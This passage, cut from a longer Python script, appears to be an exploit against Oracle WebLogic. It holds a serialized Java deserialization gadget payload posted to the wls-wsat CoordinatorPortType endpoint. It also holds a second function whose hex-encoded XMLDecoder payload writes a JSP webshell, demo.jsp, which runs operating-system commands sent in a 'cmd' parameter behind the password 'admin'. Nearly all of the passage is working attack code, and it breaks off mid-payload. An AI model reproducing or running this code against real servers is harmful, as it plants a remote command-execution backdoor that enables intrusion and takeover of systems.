index=\"3788\"><byte>122</byte></void><void index=\"3789\"><byte>97</byte></void><void index=\"3790\"><byte>98</byte></void><void index=\"3791\"><byte>108</byte></void><void index=\"3792\"><byte>101</byte></void><void index=\"3793\"><byte>1</byte></void><void index=\"3794\"><byte>0</byte></void><void index=\"3795\"><byte>31</byte></void><void index=\"3796\"><byte>121</byte></void><void index=\"3797\"><byte>115</byte></void><void index=\"3798\"><byte>111</byte></void><void index=\"3799\"><byte>115</byte></void><void index=\"3800\"><byte>101</byte></void><void index=\"3801\"><byte>114</byte></void><void index=\"3802\"><byte>105</byte></void><void index=\"3803\"><byte>97</byte></void><void index=\"3804\"><byte>108</byte></void><void index=\"3805\"><byte>47</byte></void><void index=\"3806\"><byte>112</byte></void><void index=\"3807\"><byte>97</byte></void><void index=\"3808\"><byte>121</byte></void><void index=\"3809\"><byte>108</byte></void><void index=\"3810\"><byte>111</byte></void><void index=\"3811\"><byte>97</byte></void><void index=\"3812\"><byte>100</byte></void><void index=\"3813\"><byte>115</byte></void><void index=\"3814\"><byte>47</byte></void><void index=\"3815\"><byte>117</byte></void><void index=\"3816\"><byte>116</byte></void><void index=\"3817\"><byte>105</byte></void><void index=\"3818\"><byte>108</byte></void><void index=\"3819\"><byte>47</byte></void><void index=\"3820\"><byte>71</byte></void><void index=\"3821\"><byte>97</byte></void><void index=\"3822\"><byte>100</byte></void><void index=\"3823\"><byte>103</byte></void><void index=\"3824\"><byte>101</byte></void><void index=\"3825\"><byte>116</byte></void><void index=\"3826\"><byte>115</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>33</byte></void><void index=\"3829\"><byte>0</byte></void><void index=\"3830\"><byte>2</byte></void><void index=\"3831\"><byte>0</byte></void><void index=\"3832\"><byte>3</byte></void><void index=\"3833\"><byte>0</byte></void><void index=\"3834\"><byte>1</byte></void><void index=\"3835\"><byte>0</byte></void><void index=\"3836\"><byte>4</byte></void><void index=\"3837\"><byte>0</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>0</byte></void><void index=\"3840\"><byte>26</byte></void><void index=\"3841\"><byte>0</byte></void><void index=\"3842\"><byte>5</byte></void><void index=\"3843\"><byte>0</byte></void><void index=\"3844\"><byte>6</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>1</byte></void><void index=\"3847\"><byte>0</byte></void><void index=\"3848\"><byte>7</byte></void><void index=\"3849\"><byte>0</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>0</byte></void><void index=\"3852\"><byte>2</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>8</byte></void><void index=\"3855\"><byte>0</byte></void><void index=\"3856\"><byte>1</byte></void><void index=\"3857\"><byte>0</byte></void><void index=\"3858\"><byte>1</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>10</byte></void><void index=\"3861\"><byte>0</byte></void><void index=\"3862\"><byte>11</byte></void><void index=\"3863\"><byte>0</byte></void><void index=\"3864\"><byte>1</byte></void><void index=\"3865\"><byte>0</byte></void><void index=\"3866\"><byte>12</byte></void><void index=\"3867\"><byte>0</byte></void><void index=\"3868\"><byte>0</byte></void><void index=\"3869\"><byte>0</byte></void><void index=\"3870\"><byte>47</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>1</byte></void><void index=\"3873\"><byte>0</byte></void><void index=\"3874\"><byte>1</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>0</byte></void><void index=\"3877\"><byte>0</byte></void><void index=\"3878\"><byte>5</byte></void><void index=\"3879\"><byte>42</byte></void><void index=\"3880\"><byte>-73</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>1</byte></void><void index=\"3883\"><byte>-79</byte></void><void index=\"3884\"><byte>0</byte></void><void index=\"3885\"><byte>0</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>2</byte></void><void index=\"3888\"><byte>0</byte></void><void index=\"3889\"><byte>13</byte></void><void index=\"3890\"><byte>0</byte></void><void index=\"3891\"><byte>0</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>6</byte></void><void index=\"3894\"><byte>0</byte></void><void index=\"3895\"><byte>1</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>0</byte></void><void index=\"3898\"><byte>0</byte></void><void index=\"3899\"><byte>60</byte></void><void index=\"3900\"><byte>0</byte></void><void index=\"3901\"><byte>14</byte></void><void index=\"3902\"><byte>0</byte></void><void index=\"3903\"><byte>0</byte></void><void index=\"3904\"><byte>0</byte></void><void index=\"3905\"><byte>12</byte></void><void index=\"3906\"><byte>0</byte></void><void index=\"3907\"><byte>1</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>0</byte></void><void index=\"3910\"><byte>0</byte></void><void index=\"3911\"><byte>5</byte></void><void index=\"3912\"><byte>0</byte></void><void index=\"3913\"><byte>15</byte></void><void index=\"3914\"><byte>0</byte></void><void index=\"3915\"><byte>18</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>0</byte></void><void index=\"3918\"><byte>0</byte></void><void index=\"3919\"><byte>2</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>19</byte></void><void index=\"3922\"><byte>0</byte></void><void index=\"3923\"><byte>0</byte></void><void index=\"3924\"><byte>0</byte></void><void index=\"3925\"><byte>2</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>20</byte></void><void index=\"3928\"><byte>0</byte></void><void index=\"3929\"><byte>17</byte></void><void index=\"3930\"><byte>0</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>0</byte></void><void index=\"3933\"><byte>10</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>1</byte></void><void index=\"3936\"><byte>0</byte></void><void index=\"3937\"><byte>2</byte></void><void index=\"3938\"><byte>0</byte></void><void index=\"3939\"><byte>22</byte></void><void index=\"3940\"><byte>0</byte></void><void index=\"3941\"><byte>16</byte></void><void index=\"3942\"><byte>0</byte></void><void index=\"3943\"><byte>9</byte></void><void index=\"3944\"><byte>112</byte></void><void index=\"3945\"><byte>116</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>4</byte></void><void index=\"3948\"><byte>80</byte></void><void index=\"3949\"><byte>119</byte></void><void index=\"3950\"><byte>110</byte></void><void index=\"3951\"><byte>114</byte></void><void index=\"3952\"><byte>112</byte></void><void index=\"3953\"><byte>119</byte></void><void index=\"3954\"><byte>1</byte></void><void index=\"3955\"><byte>0</byte></void><void index=\"3956\"><byte>120</byte></void><void index=\"3957\"><byte>115</byte></void><void index=\"3958\"><byte>125</byte></void><void index=\"3959\"><byte>0</byte></void><void index=\"3960\"><byte>0</byte></void><void index=\"3961\"><byte>0</byte></void><void index=\"3962\"><byte>1</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>29</byte></void><void index=\"3965\"><byte>106</byte></void><void index=\"3966\"><byte>97</byte></void><void index=\"3967\"><byte>118</byte></void><void index=\"3968\"><byte>97</byte></void><void index=\"3969\"><byte>120</byte></void><void index=\"3970\"><byte>46</byte></void><void index=\"3971\"><byte>120</byte></void><void index=\"3972\"><byte>109</byte></void><void index=\"3973\"><byte>108</byte></void><void index=\"3974\"><byte>46</byte></void><void index=\"3975\"><byte>116</byte></void><void index=\"3976\"><byte>114</byte></void><void index=\"3977\"><byte>97</byte></void><void index=\"3978\"><byte>110</byte></void><void index=\"3979\"><byte>115</byte></void><void index=\"3980\"><byte>102</byte></void><void index=\"3981\"><byte>111</byte></void><void index=\"3982\"><byte>114</byte></void><void index=\"3983\"><byte>109</byte></void><void index=\"3984\"><byte>46</byte></void><void index=\"3985\"><byte>84</byte></void><void index=\"3986\"><byte>101</byte></void><void index=\"3987\"><byte>109</byte></void><void index=\"3988\"><byte>112</byte></void><void index=\"3989\"><byte>108</byte></void><void index=\"3990\"><byte>97</byte></void><void index=\"3991\"><byte>116</byte></void><void index=\"3992\"><byte>101</byte></void><void index=\"3993\"><byte>115</byte></void><void index=\"3994\"><byte>120</byte></void><void index=\"3995\"><byte>114</byte></void><void index=\"3996\"><byte>0</byte></void><void index=\"3997\"><byte>23</byte></void><void index=\"3998\"><byte>106</byte></void><void index=\"3999\"><byte>97</byte></void><void index=\"4000\"><byte>118</byte></void><void index=\"4001\"><byte>97</byte></void><void index=\"4002\"><byte>46</byte></void><void index=\"4003\"><byte>108</byte></void><void index=\"4004\"><byte>97</byte></void><void index=\"4005\"><byte>110</byte></void><void index=\"4006\"><byte>103</byte></void><void index=\"4007\"><byte>46</byte></void><void index=\"4008\"><byte>114</byte></void><void index=\"4009\"><byte>101</byte></void><void index=\"4010\"><byte>102</byte></void><void index=\"4011\"><byte>108</byte></void><void index=\"4012\"><byte>101</byte></void><void index=\"4013\"><byte>99</byte></void><void index=\"4014\"><byte>116</byte></void><void index=\"4015\"><byte>46</byte></void><void index=\"4016\"><byte>80</byte></void><void index=\"4017\"><byte>114</byte></void><void index=\"4018\"><byte>111</byte></void><void index=\"4019\"><byte>120</byte></void><void index=\"4020\"><byte>121</byte></void><void index=\"4021\"><byte>-31</byte></void><void index=\"4022\"><byte>39</byte></void><void index=\"4023\"><byte>-38</byte></void><void index=\"4024\"><byte>32</byte></void><void index=\"4025\"><byte>-52</byte></void><void index=\"4026\"><byte>16</byte></void><void index=\"4027\"><byte>67</byte></void><void index=\"4028\"><byte>-53</byte></void><void index=\"4029\"><byte>2</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>1</byte></void><void index=\"4032\"><byte>76</byte></void><void index=\"4033\"><byte>0</byte></void><void index=\"4034\"><byte>1</byte></void><void index=\"4035\"><byte>104</byte></void><void index=\"4036\"><byte>116</byte></void><void index=\"4037\"><byte>0</byte></void><void index=\"4038\"><byte>37</byte></void><void index=\"4039\"><byte>76</byte></void><void index=\"4040\"><byte>106</byte></void><void index=\"4041\"><byte>97</byte></void><void index=\"4042\"><byte>118</byte></void><void index=\"4043\"><byte>97</byte></void><void index=\"4044\"><byte>47</byte></void><void index=\"4045\"><byte>108</byte></void><void index=\"4046\"><byte>97</byte></void><void index=\"4047\"><byte>110</byte></void><void index=\"4048\"><byte>103</byte></void><void index=\"4049\"><byte>47</byte></void><void index=\"4050\"><byte>114</byte></void><void index=\"4051\"><byte>101</byte></void><void index=\"4052\"><byte>102</byte></void><void index=\"4053\"><byte>108</byte></void><void index=\"4054\"><byte>101</byte></void><void index=\"4055\"><byte>99</byte></void><void index=\"4056\"><byte>116</byte></void><void index=\"4057\"><byte>47</byte></void><void index=\"4058\"><byte>73</byte></void><void index=\"4059\"><byte>110</byte></void><void index=\"4060\"><byte>118</byte></void><void index=\"4061\"><byte>111</byte></void><void index=\"4062\"><byte>99</byte></void><void index=\"4063\"><byte>97</byte></void><void index=\"4064\"><byte>116</byte></void><void index=\"4065\"><byte>105</byte></void><void index=\"4066\"><byte>111</byte></void><void index=\"4067\"><byte>110</byte></void><void index=\"4068\"><byte>72</byte></void><void index=\"4069\"><byte>97</byte></void><void index=\"4070\"><byte>110</byte></void><void index=\"4071\"><byte>100</byte></void><void index=\"4072\"><byte>108</byte></void><void index=\"4073\"><byte>101</byte></void><void index=\"4074\"><byte>114</byte></void><void index=\"4075\"><byte>59</byte></void><void index=\"4076\"><byte>120</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>115</byte></void><void index=\"4079\"><byte>114</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>50</byte></void><void index=\"4082\"><byte>115</byte></void><void index=\"4083\"><byte>117</byte></void><void index=\"4084\"><byte>110</byte></void><void index=\"4085\"><byte>46</byte></void><void index=\"4086\"><byte>114</byte></void><void index=\"4087\"><byte>101</byte></void><void index=\"4088\"><byte>102</byte></void><void index=\"4089\"><byte>108</byte></void><void index=\"4090\"><byte>101</byte></void><void index=\"4091\"><byte>99</byte></void><void index=\"4092\"><byte>116</byte></void><void index=\"4093\"><byte>46</byte></void><void index=\"4094\"><byte>97</byte></void><void index=\"4095\"><byte>110</byte></void><void index=\"4096\"><byte>110</byte></void><void index=\"4097\"><byte>111</byte></void><void index=\"4098\"><byte>116</byte></void><void index=\"4099\"><byte>97</byte></void><void index=\"4100\"><byte>116</byte></void><void index=\"4101\"><byte>105</byte></void><void index=\"4102\"><byte>111</byte></void><void index=\"4103\"><byte>110</byte></void><void index=\"4104\"><byte>46</byte></void><void index=\"4105\"><byte>65</byte></void><void index=\"4106\"><byte>110</byte></void><void index=\"4107\"><byte>110</byte></void><void index=\"4108\"><byte>111</byte></void><void index=\"4109\"><byte>116</byte></void><void index=\"4110\"><byte>97</byte></void><void index=\"4111\"><byte>116</byte></void><void index=\"4112\"><byte>105</byte></void><void index=\"4113\"><byte>111</byte></void><void index=\"4114\"><byte>110</byte></void><void index=\"4115\"><byte>73</byte></void><void index=\"4116\"><byte>110</byte></void><void index=\"4117\"><byte>118</byte></void><void index=\"4118\"><byte>111</byte></void><void index=\"4119\"><byte>99</byte></void><void index=\"4120\"><byte>97</byte></void><void index=\"4121\"><byte>116</byte></void><void index=\"4122\"><byte>105</byte></void><void index=\"4123\"><byte>111</byte></void><void index=\"4124\"><byte>110</byte></void><void index=\"4125\"><byte>72</byte></void><void index=\"4126\"><byte>97</byte></void><void index=\"4127\"><byte>110</byte></void><void index=\"4128\"><byte>100</byte></void><void index=\"4129\"><byte>108</byte></void><void index=\"4130\"><byte>101</byte></void><void index=\"4131\"><byte>114</byte></void><void index=\"4132\"><byte>85</byte></void><void index=\"4133\"><byte>-54</byte></void><void index=\"4134\"><byte>-11</byte></void><void index=\"4135\"><byte>15</byte></void><void index=\"4136\"><byte>21</byte></void><void index=\"4137\"><byte>-53</byte></void><void index=\"4138\"><byte>126</byte></void><void index=\"4139\"><byte>-91</byte></void><void index=\"4140\"><byte>2</byte></void><void index=\"4141\"><byte>0</byte></void><void index=\"4142\"><byte>2</byte></void><void index=\"4143\"><byte>76</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>12</byte></void><void index=\"4146\"><byte>109</byte></void><void index=\"4147\"><byte>101</byte></void><void index=\"4148\"><byte>109</byte></void><void index=\"4149\"><byte>98</byte></void><void index=\"4150\"><byte>101</byte></void><void index=\"4151\"><byte>114</byte></void><void index=\"4152\"><byte>86</byte></void><void index=\"4153\"><byte>97</byte></void><void index=\"4154\"><byte>108</byte></void><void index=\"4155\"><byte>117</byte></void><void index=\"4156\"><byte>101</byte></void><void index=\"4157\"><byte>115</byte></void><void index=\"4158\"><byte>116</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>15</byte></void><void index=\"4161\"><byte>76</byte></void><void index=\"4162\"><byte>106</byte></void><void index=\"4163\"><byte>97</byte></void><void index=\"4164\"><byte>118</byte></void><void index=\"4165\"><byte>97</byte></void><void index=\"4166\"><byte>47</byte></void><void index=\"4167\"><byte>117</byte></void><void index=\"4168\"><byte>116</byte></void><void index=\"4169\"><byte>105</byte></void><void index=\"4170\"><byte>108</byte></void><void index=\"4171\"><byte>47</byte></void><void index=\"4172\"><byte>77</byte></void><void index=\"4173\"><byte>97</byte></void><void index=\"4174\"><byte>112</byte></void><void index=\"4175\"><byte>59</byte></void><void index=\"4176\"><byte>76</byte></void><void index=\"4177\"><byte>0</byte></void><void index=\"4178\"><byte>4</byte></void><void index=\"4179\"><byte>116</byte></void><void index=\"4180\"><byte>121</byte></void><void index=\"4181\"><byte>112</byte></void><void index=\"4182\"><byte>101</byte></void><void index=\"4183\"><byte>116</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>17</byte></void><void index=\"4186\"><byte>76</byte></void><void index=\"4187\"><byte>106</byte></void><void index=\"4188\"><byte>97</byte></void><void index=\"4189\"><byte>118</byte></void><void index=\"4190\"><byte>97</byte></void><void index=\"4191\"><byte>47</byte></void><void index=\"4192\"><byte>108</byte></void><void index=\"4193\"><byte>97</byte></void><void index=\"4194\"><byte>110</byte></void><void index=\"4195\"><byte>103</byte></void><void index=\"4196\"><byte>47</byte></void><void index=\"4197\"><byte>67</byte></void><void index=\"4198\"><byte>108</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>115</byte></void><void index=\"4201\"><byte>115</byte></void><void index=\"4202\"><byte>59</byte></void><void index=\"4203\"><byte>120</byte></void><void index=\"4204\"><byte>112</byte></void><void index=\"4205\"><byte>115</byte></void><void index=\"4206\"><byte>114</byte></void><void index=\"4207\"><byte>0</byte></void><void index=\"4208\"><byte>17</byte></void><void index=\"4209\"><byte>106</byte></void><void index=\"4210\"><byte>97</byte></void><void index=\"4211\"><byte>118</byte></void><void index=\"4212\"><byte>97</byte></void><void index=\"4213\"><byte>46</byte></void><void index=\"4214\"><byte>117</byte></void><void index=\"4215\"><byte>116</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>108</byte></void><void index=\"4218\"><byte>46</byte></void><void index=\"4219\"><byte>72</byte></void><void index=\"4220\"><byte>97</byte></void><void index=\"4221\"><byte>115</byte></void><void index=\"4222\"><byte>104</byte></void><void index=\"4223\"><byte>77</byte></void><void index=\"4224\"><byte>97</byte></void><void index=\"4225\"><byte>112</byte></void><void index=\"4226\"><byte>5</byte></void><void index=\"4227\"><byte>7</byte></void><void index=\"4228\"><byte>-38</byte></void><void index=\"4229\"><byte>-63</byte></void><void index=\"4230\"><byte>-61</byte></void><void index=\"4231\"><byte>22</byte></void><void index=\"4232\"><byte>96</byte></void><void index=\"4233\"><byte>-47</byte></void><void index=\"4234\"><byte>3</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>2</byte></void><void index=\"4237\"><byte>70</byte></void><void index=\"4238\"><byte>0</byte></void><void index=\"4239\"><byte>10</byte></void><void index=\"4240\"><byte>108</byte></void><void index=\"4241\"><byte>111</byte></void><void index=\"4242\"><byte>97</byte></void><void index=\"4243\"><byte>100</byte></void><void index=\"4244\"><byte>70</byte></void><void index=\"4245\"><byte>97</byte></void><void index=\"4246\"><byte>99</byte></void><void index=\"4247\"><byte>116</byte></void><void index=\"4248\"><byte>111</byte></void><void index=\"4249\"><byte>114</byte></void><void index=\"4250\"><byte>73</byte></void><void index=\"4251\"><byte>0</byte></void><void index=\"4252\"><byte>9</byte></void><void index=\"4253\"><byte>116</byte></void><void index=\"4254\"><byte>104</byte></void><void index=\"4255\"><byte>114</byte></void><void index=\"4256\"><byte>101</byte></void><void index=\"4257\"><byte>115</byte></void><void index=\"4258\"><byte>104</byte></void><void index=\"4259\"><byte>111</byte></void><void index=\"4260\"><byte>108</byte></void><void index=\"4261\"><byte>100</byte></void><void index=\"4262\"><byte>120</byte></void><void index=\"4263\"><byte>112</byte></void><void index=\"4264\"><byte>63</byte></void><void index=\"4265\"><byte>64</byte></void><void index=\"4266\"><byte>0</byte></void><void index=\"4267\"><byte>0</byte></void><void index=\"4268\"><byte>0</byte></void><void index=\"4269\"><byte>0</byte></void><void index=\"4270\"><byte>0</byte></void><void index=\"4271\"><byte>12</byte></void><void index=\"4272\"><byte>119</byte></void><void index=\"4273\"><byte>8</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>0</byte></void><void index=\"4276\"><byte>0</byte></void><void index=\"4277\"><byte>16</byte></void><void index=\"4278\"><byte>0</byte></void><void index=\"4279\"><byte>0</byte></void><void index=\"4280\"><byte>0</byte></void><void index=\"4281\"><byte>1</byte></void><void index=\"4282\"><byte>116</byte></void><void index=\"4283\"><byte>0</byte></void><void index=\"4284\"><byte>8</byte></void><void index=\"4285\"><byte>102</byte></void><void index=\"4286\"><byte>53</byte></void><void index=\"4287\"><byte>97</byte></void><void index=\"4288\"><byte>53</byte></void><void index=\"4289\"><byte>97</byte></void><void index=\"4290\"><byte>54</byte></void><void index=\"4291\"><byte>48</byte></void><void index=\"4292\"><byte>56</byte></void><void index=\"4293\"><byte>113</byte></void><void index=\"4294\"><byte>0</byte></void><void index=\"4295\"><byte>126</byte></void><void index=\"4296\"><byte>0</byte></void><void index=\"4297\"><byte>9</byte></void><void index=\"4298\"><byte>120</byte></void><void index=\"4299\"><byte>118</byte></void><void index=\"4300\"><byte>114</byte></void><void index=\"4301\"><byte>0</byte></void><void index=\"4302\"><byte>29</byte></void><void index=\"4303\"><byte>106</byte></void><void index=\"4304\"><byte>97</byte></void><void index=\"4305\"><byte>118</byte></void><void index=\"4306\"><byte>97</byte></void><void index=\"4307\"><byte>120</byte></void><void index=\"4308\"><byte>46</byte></void><void index=\"4309\"><byte>120</byte></void><void index=\"4310\"><byte>109</byte></void><void index=\"4311\"><byte>108</byte></void><void index=\"4312\"><byte>46</byte></void><void index=\"4313\"><byte>116</byte></void><void index=\"4314\"><byte>114</byte></void><void index=\"4315\"><byte>97</byte></void><void index=\"4316\"><byte>110</byte></void><void index=\"4317\"><byte>115</byte></void><void index=\"4318\"><byte>102</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>114</byte></void><void index=\"4321\"><byte>109</byte></void><void index=\"4322\"><byte>46</byte></void><void index=\"4323\"><byte>84</byte></void><void index=\"4324\"><byte>101</byte></void><void index=\"4325\"><byte>109</byte></void><void index=\"4326\"><byte>112</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>97</byte></void><void index=\"4329\"><byte>116</byte></void><void index=\"4330\"><byte>101</byte></void><void index=\"4331\"><byte>115</byte></void><void index=\"4332\"><byte>0</byte></void><void index=\"4333\"><byte>0</byte></void><void index=\"4334\"><byte>0</byte></void><void index=\"4335\"><byte>0</byte></void><void index=\"4336\"><byte>0</byte></void><void index=\"4337\"><byte>0</byte></void><void index=\"4338\"><byte>0</byte></void><void index=\"4339\"><byte>0</byte></void><void index=\"4340\"><byte>0</byte></void><void index=\"4341\"><byte>0</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>120</byte></void><void index=\"4344\"><byte>112</byte></void><void index=\"4345\"><byte>120</byte></void></array> \n</void></class>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body></soapenv:Body></soapenv:Envelope>'''\n\turl=\"%s/wls-wsat/CoordinatorPortType\"%(ip)\n\trsp = requests.post(url, data=body, verify=False, headers=headers)\n\tlogger.info(\"\\r\\nShell地址: %s/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig\"%(ip))\n\t#print(\"Shell地址: %s/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig\"%(ip))\ndef webshell_12_1_3(ip):\n\tbody='''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" \nxmlns:wsa=\"http://www.w3.org/2005/08/addressing\" \nxmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">   \n<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>\n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">  \n<class><string>org.slf4j.ext.EventData</string><void><string>\n<![CDATA[<java>\n        <object class=\"java.io.PrintWriter\">     \n        <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/demo.jsp</string>\n       <void method=\"println\">\n       <string>&#x3c;&#x25;&#x40;&#x20;&#x70;&#x61;&#x67;&#x65;&#x20;&#x6c;&#x61;&#x6e;&#x67;&#x75;&#x61;&#x67;&#x65;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x22;&#x20;&#x63;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x54;&#x79;&#x70;&#x65;&#x3d;&#x22;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x68;&#x74;&#x6d;&#x6c;&#x3b;&#x20;&#x63;&#x68;&#x61;&#x72;&#x73;&#x65;&#x74;&#x3d;&#x47;&#x42;&#x4b;&#x22;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x70;&#x61;&#x67;&#x65;&#x45;&#x6e;&#x63;&#x6f;&#x64;&#x69;&#x6e;&#x67;&#x3d;&#x22;&#x55;&#x54;&#x46;&#x2d;&#x38;&#x22;&#x25;&#x3e;&#x0a;&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x68;&#x74;&#x6d;&#x6c;&#x20;&#x50;&#x55;&#x42;&#x4c;&#x49;&#x43;&#x20;&#x22;&#x2d;&#x2f;&#x2f;&#x57;&#x33;&#x43;&#x2f;&#x2f;&#x44;&#x54;&#x44;&#x20;&#x48;&#x54;&#x4d;&#x4c;&#x20;&#x34;&#x2e;&#x30;&#x31;&#x20;&#x54;&#x72;&#x61;&#x6e;&#x73;&#x69;&#x74;&#x69;&#x6f;&#x6e;&#x61;&#x6c;&#x2f;&#x2f;&#x45;&#x4e;&#x22;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x77;&#x77;&#x77;&#x2e;&#x77;&#x33;&#x2e;&#x6f;&#x72;&#x67;&#x2f;&#x54;&#x52;&#x2f;&#x68;&#x74;&#x6d;&#x6c;&#x34;&#x2f;&#x6c;&#x6f;&#x6f;&#x73;&#x65;&#x2e;&#x64;&#x74;&#x64;&#x22;&#x3e;&#x0a;&#x3c;&#x68;&#x74;&#x6d;&#x6c;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x62;&#x6f;&#x64;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x25;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x69;&#x66;&#x20;&#x28;&#x22;&#x61;&#x64;&#x6d;&#x69;&#x6e;&#x22;&#x2e;&#x65;&#x71;&#x75;&#x61;&#x6c;&#x73;&#x28;&#x72;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x67;&#x65;&#x74;&#x50;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x28;&#x22;&#x70;&#x77;&#x64;&#x22;&#x29;&#x29;&#x29;&#x20;&#x7b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x70;&#x75;&#x74;&#x20;&#x3d;&#x20;&#x52;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x67;&#x65;&#x74;&#x52;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x28;&#x29;&#x2e;&#x65;&#x78;&#x65;&#x63;&#x28;&#x72;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x67;&#x65;&#x74;&#x50;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x28;&#x22;&#x63;&#x6d;&#x64;&#x22;&#x29;&#x29;&#x2e;&#x67;&#x65;&#x74;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x28;&#x29;&#x3b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x6c;&#x65;&#x6e;&#x20;&#x3d;&#x20;&#x2d;&#x31;&#x3b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x62;&#x79;&#x74;&#x65;&#x5b;&#x5d;&#x20;&#x62;&#x79;&#x74;&#x65;&#x73;&#x20;&#x3d;&#x20;&#x6e;&#x65;&#x77;&#x20;&#x62;&#x79;&#x74;&#x65;&#x5b;&#x34;&#x30;&#x39;&#x32;&#x5d;&#x3b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x6f;&#x75;&#x74;&#x2e;&#x70;&#x72;&#x69;&#x6e;&#x74;&#x28;&#x22;&#x3c;&#x70;&#x72;&#x65;&#x3e;&#x22;&#x29;&#x3b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x77;&#x68;&#x69;&#x6c;&#x65;&#x20;&#x28;&#x28;&#x6c;&#x65;&#x6e;&#x20;&#x3d;&#x20;&#x69;&#x6e;&#x70;&#x75;&#x74;&#x2e;&#x72;&#x65;&#x61;&#x64;&#x28;&#x62;&#x79;&#x74;&#x65;&#x73;&#x29;&#x29;&#x20;&#x21;&#x3d;&#x20;&#x2d;&#x31;&#x29;&#x20;&#x7b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x6f;&#x75;&#x74;&#x2e;&#x70;&#x72;&#x69;&#x6e;&#x74;&#x6c;&#x6e;&#x28;&#x6e;&#x65;&#x77;&#x20;&#x53;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x28;&#x62;&#x79;&#x74;&#x65;&#x73;&#x2c;&#x20;&#x22;&#x47;&#x42;&#x4b;&#x22;&#x29;&#x29;&#x3b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x7d